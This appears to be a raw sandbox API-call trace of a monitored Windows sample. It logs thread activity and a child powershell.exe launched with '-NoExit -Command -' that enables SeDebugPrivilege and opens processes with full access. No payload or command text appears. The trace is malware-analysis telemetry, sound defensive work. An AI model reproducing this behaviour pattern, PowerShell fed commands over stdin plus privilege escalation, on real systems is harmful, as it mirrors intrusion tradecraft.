ReadFile (in: hFile=0x1a8, lpBuffer=0x110869c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x110869c0*, lpNumberOfBytesRead=0x11073edc*=0x1f, lpOverlapped=0x0) returned 1 [0295.063] SetEvent (hEvent=0x174) returned 1 [0295.063] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086a00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086a00*, lpNumberOfBytesRead=0x11073edc*=0x40, lpOverlapped=0x0) returned 1 [0295.063] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086a80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086a80*, lpNumberOfBytesRead=0x11073edc*=0x5, lpOverlapped=0x0) returned 1 [0295.063] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086ac0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086ac0*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0297.175] SetEvent (hEvent=0x174) returned 1 [0297.175] VirtualAlloc (lpAddress=0x110f6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110f6000 [0297.176] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086b40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086b40*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0299.295] SetEvent (hEvent=0x174) returned 1 [0299.296] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086b80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086b80*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0302.068] SetEvent (hEvent=0x174) returned 1 [0302.068] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086bc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086bc0*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0304.369] SetEvent (hEvent=0x174) returned 1 [0304.369] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086c00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086c00*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0306.300] SetEvent (hEvent=0x174) returned 1 [0306.300] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086c40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086c40*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0307.916] SetEvent (hEvent=0x174) returned 1 [0307.916] VirtualAlloc (lpAddress=0x110f8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110f8000 [0307.917] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086c80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086c80*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0309.439] SetEvent (hEvent=0x174) returned 1 [0309.440] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086cc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086cc0*, lpNumberOfBytesRead=0x11073edc*=0x40, lpOverlapped=0x0) returned 1 [0311.209] SetEvent (hEvent=0x174) returned 1 [0311.209] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086d40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086d40*, lpNumberOfBytesRead=0x11073edc*=0x16, lpOverlapped=0x0) returned 1 [0311.209] VirtualAlloc (lpAddress=0x110fa000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110fa000 [0311.210] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086d80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086d80*, lpNumberOfBytesRead=0x11073edc*=0x1f, lpOverlapped=0x0) returned 1 [0311.427] SetEvent (hEvent=0x174) returned 1 [0311.427] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086dc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086dc0*, lpNumberOfBytesRead=0x11073edc*=0x40, lpOverlapped=0x0) returned 1 [0311.428] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086e40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086e40*, lpNumberOfBytesRead=0x11073edc*=0x5, lpOverlapped=0x0) returned 1 [0311.428] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086e80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086e80*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0313.503] SetEvent (hEvent=0x174) returned 1 [0313.503] VirtualAlloc (lpAddress=0x110fc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110fc000 [0313.503] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086f00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086f00*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0315.605] SetEvent (hEvent=0x174) returned 1 [0315.606] ReadFile (hFile=0x1a8, lpBuffer=0x11086f40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0) Thread: id = 6 os_tid = 0x300 [0090.080] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x311fff28, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x311fff28*=0x14c) returned 1 [0090.080] VirtualQuery (in: lpAddress=0x311fff38, lpBuffer=0x311fff38, dwLength=0x1c | out: lpBuffer=0x311fff38*(BaseAddress=0x311ff000, AllocationBase=0x31100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.080] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x150 [0090.080] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x154 [0090.080] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xffffffff) returned 0x0 [0090.222] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xffffffff) returned 0x0 [0091.099] SetEvent (hEvent=0x138) returned 1 [0091.099] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xffffffff) Thread: id = 11 os_tid = 0xd40 [0100.903] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x316bff28, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x316bff28*=0x180) returned 1 [0100.918] VirtualQuery (in: lpAddress=0x316bff38, lpBuffer=0x316bff38, dwLength=0x1c | out: lpBuffer=0x316bff38*(BaseAddress=0x316bf000, AllocationBase=0x315c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0100.918] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1cc [0100.918] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d0 [0100.918] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) Thread: id = 12 os_tid = 0x1094 [0100.920] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x317fff28, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x317fff28*=0x1d4) returned 1 [0100.920] VirtualQuery (in: lpAddress=0x317fff38, lpBuffer=0x317fff38, dwLength=0x1c | out: lpBuffer=0x317fff38*(BaseAddress=0x317ff000, AllocationBase=0x31700000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0100.920] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d8 [0100.920] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1dc [0100.920] WaitForSingleObject (hHandle=0x1d8, dwMilliseconds=0xffffffff) Process: id = "2" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x37fab000" os_pid = "0x1064" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13d0" cmd_line = "powershell.exe -NoExit -Command -" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7 os_tid = 0x1068 [0107.056] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0107.061] RoInitialize () returned 0x1 [0107.061] RoUninitialize () returned 0x0 [0107.682] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0107.692] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0110.984] SysStringByteLen (bstr="-NoExit") returned 0xe [0110.984] SysStringByteLen (bstr="-NoExit") returned 0xe [0110.984] SysStringByteLen (bstr="-Command") returned 0x10 [0110.984] SysStringByteLen (bstr="-Command") returned 0x10 [0110.984] SysStringByteLen (bstr="-") returned 0x2 [0110.984] SysStringByteLen (bstr="-") returned 0x2 [0114.007] WindowsCreateStringReference () returned 0x0 [0114.007] RoGetActivationFactory () returned 0x0 [0119.841] QueryInterface () returned 0x0 [0119.842] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0119.842] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0119.842] QueryInterface () returned 0x0 [0119.842] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e [0119.842] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0119.843] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4 [0119.843] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0119.843] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0119.843] Release () returned 0x4 [0119.843] CoGetContextToken (in: pToken=0xdad560 | out: pToken=0xdad560) returned 0x0 [0119.843] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0119.844] CoGetContextToken (in: pToken=0xdad870 | out: pToken=0xdad870) returned 0x0 [0119.844] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0119.844] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4 [0119.844] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0119.844] WindowsDeleteString () returned 0x0 [0119.845] Release () returned 0x2 [0119.845] CoGetContextToken (in: pToken=0xdadfe8 | out: pToken=0xdadfe8) returned 0x0 [0119.849] CoGetContextToken (in: pToken=0xdadf48 | out: pToken=0xdadf48) returned 0x0 [0119.849] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0119.849] AddRef () returned 0x4 [0119.850] Release () returned 0x3 [0120.068] IIDFromString (in: lpsz="{410B7711-FF3B-477F-9C9A-D2EFDA302DC3}", lpiid=0xdad680 | out: lpiid=0xdad680) returned 0x0 [0120.070] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0 [0120.772] GenericStreamBase::Write () returned 0x0 [0120.772] GenericStreamBase::Write () returned 0x0 [0120.773] CoCreateGuid (in: pguid=0x740947a8 | out: pguid=0x740947a8*(Data1=0xa4070d83, Data2=0x2a46, Data3=0x46fa, Data4=([0]=0x8e, [1]=0x51, [2]=0xcc, [3]=0x5, [4]=0x48, [5]=0xda, [6]=0xce, [7]=0x55))) returned 0x0 [0120.773] GenericStreamBase::Write () returned 0x0 [0120.777] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0120.777] CExtensionCatalog::AddRef () returned 0x3 [0120.777] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0120.777] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0120.777] Release () returned 0x3 [0120.777] CoGetContextToken (in: pToken=0xdad438 | out: pToken=0xdad438) returned 0x0 [0120.777] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0120.833] WindowsCreateString () returned 0x0 [0120.834] CExtensionCatalog::AddRef () returned 0x4 [0120.834] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3 [0120.835] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0 [0120.940] EtwEventRegister (in: ProviderId=0x5315b54, EnableCallback=0x5072bc6, CallbackContext=0x0, RegHandle=0x5315b30 | out: RegHandle=0x5315b30) returned 0x0 [0120.950] EtwEventRegister (in: ProviderId=0x5316258, EnableCallback=0x5072bee, CallbackContext=0x0, RegHandle=0x5316234 | out: RegHandle=0x5316234) returned 0x0 [0120.950] EtwEventSetInformation (RegHandle=0x31d9e18, InformationClass=0x2d, EventInformation=0x2, InformationLength=0x53161f8) returned 0x0 [0121.779] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdae974*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdae974*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0121.808] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0xdae974*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdae974*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x4f, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0121.809] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdae924*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdae924*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0121.890] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0xdae984*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x4f, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0xdae984*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x4f, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0121.914] EtwEventRegister (in: ProviderId=0x5316a04, EnableCallback=0x5072c16, CallbackContext=0x0, RegHandle=0x53169dc | out: RegHandle=0x53169dc) returned 0x0 [0121.998] EtwEventWriteTransfer (RegHandle=0x31da328, EventDescriptor=0x2e, ActivityId=0xdae998, RelatedActivityId=0xdae944, UserDataCount=0x0, UserData=0x0) returned 0x0 [0122.071] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0xdae100 | out: phkResult=0xdae100*=0x0) returned 0x2 [0122.073] RegCloseKey (hKey=0x80000002) returned 0x0 [0122.293] LocalAlloc (uFlags=0x0, uBytes=0x208) returned 0x323c478 [0122.293] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x104, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0122.294] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0122.294] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0122.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdae848) returned 1 [0122.294] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xdae8c4 | out: lpFileInformation=0xdae8c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ce8766, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x71ce8766, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x71d0e9d1, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x623400)) returned 1 [0122.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdae844) returned 1 [0122.294] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xdae938 | out: lpdwHandle=0xdae938) returned 0x94c [0122.766] GetFileVersionInfoW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x53194a0 | out: lpData=0x53194a0) returned 1 [0122.770] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdae90c, puLen=0xdae908 | out: lplpBuffer=0xdae90c*=0x531953c, puLen=0xdae908) returned 1 [0122.880] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x5319618, puLen=0xdae888) returned 1 [0122.880] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x531966c, puLen=0xdae888) returned 1 [0122.880] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x53196c8, puLen=0xdae888) returned 1 [0122.880] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x5319708, puLen=0xdae888) returned 1 [0122.880] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x5319770, puLen=0xdae888) returned 1 [0122.880] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x531980c, puLen=0xdae888) returned 1 [0122.880] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x5319870, puLen=0xdae888) returned 1 [0122.880] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x53198ec, puLen=0xdae888) returned 1 [0122.880] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x5319594, puLen=0xdae888) returned 1 [0122.880] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x0, puLen=0xdae888) returned 0 [0122.881] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x0, puLen=0xdae888) returned 0 [0122.881] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xdae88c, puLen=0xdae888 | out: lplpBuffer=0xdae88c*=0x0, puLen=0xdae888) returned 0 [0122.881] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdae880, puLen=0xdae87c | out: lplpBuffer=0xdae880*=0x531953c, puLen=0xdae87c) returned 1 [0122.881] VerLanguageNameW (in: wLang=0x0, szLang=0xdae610, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0122.888] VerQueryValueW (in: pBlock=0x53194a0, lpSubBlock="\\", lplpBuffer=0xdae890, puLen=0xdae88c | out: lplpBuffer=0xdae890*=0x53194c8, puLen=0xdae88c) returned 1 [0122.894] GetCurrentProcessId () returned 0x1064 [0122.924] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xdae154 | out: lpLuid=0xdae154*(LowPart=0x14, HighPart=0)) returned 1 [0122.925] GetCurrentProcess () returned 0xffffffff [0122.926] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xdae150 | out: TokenHandle=0xdae150*=0xdc) returned 1 [0122.926] AdjustTokenPrivileges (in: TokenHandle=0xdc, DisableAllPrivileges=0, NewState=0x531c39c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.927] CloseHandle (hObject=0xdc) returned 1 [0122.933] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1064) returned 0xdc [0123.034] EnumProcessModules (in: hProcess=0xdc, lphModule=0x531c3e0, cb=0x100, lpcbNeeded=0xdae8c0 | out: lphModule=0x531c3e0, lpcbNeeded=0xdae8c0) returned 1 [0123.037] GetModuleInformation (in: hProcess=0xdc, hModule=0x1020000, lpmodinfo=0x531c520, cb=0xc | out: lpmodinfo=0x531c520*(lpBaseOfDll=0x1020000, SizeOfImage=0x6c000, EntryPoint=0x10295f0)) returned 1 [0123.038] CoTaskMemAlloc (cb=0x804) returned 0x3240c70 [0123.040] GetModuleBaseNameW (in: hProcess=0xdc, hModule=0x1020000, lpBaseName=0x3240c70, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0123.041] CoTaskMemFree (pv=0x3240c70) [0123.042] CoTaskMemAlloc (cb=0x804) returned 0x3240c70 [0123.042] GetModuleFileNameExW (in: hProcess=0xdc, hModule=0x1020000, lpFilename=0x3240c70, nSize=0x800 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0123.043] CoTaskMemFree (pv=0x3240c70) [0123.044] CloseHandle (hObject=0xdc) returned 1 [0123.046] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1064) returned 0xdc [0123.047] GetExitCodeProcess (in: hProcess=0xdc, lpExitCode=0x531bb04 | out: lpExitCode=0x531bb04*=0x103) returned 1 [0123.401] EnumWindows (lpEnumFunc=0x5072c3e, lParam=0x0) returned 0 [0123.405] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0xae8 [0123.405] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x940 [0123.405] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.405] GetWindowThreadProcessId (in: hWnd=0x100c8, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.406] GetWindowThreadProcessId (in: hWnd=0x100c4, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.406] GetWindowThreadProcessId (in: hWnd=0x100c0, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.406] GetWindowThreadProcessId (in: hWnd=0x100ac, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.406] GetWindowThreadProcessId (in: hWnd=0x100a4, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.406] GetWindowThreadProcessId (in: hWnd=0x10098, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.407] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.407] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.407] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.407] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0x80c [0123.408] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0xdae824 | out: lpdwProcessId=0xdae824) returned 0xc9c [0123.408] GetWindowThreadProcessId (in: hWnd=0x10100, 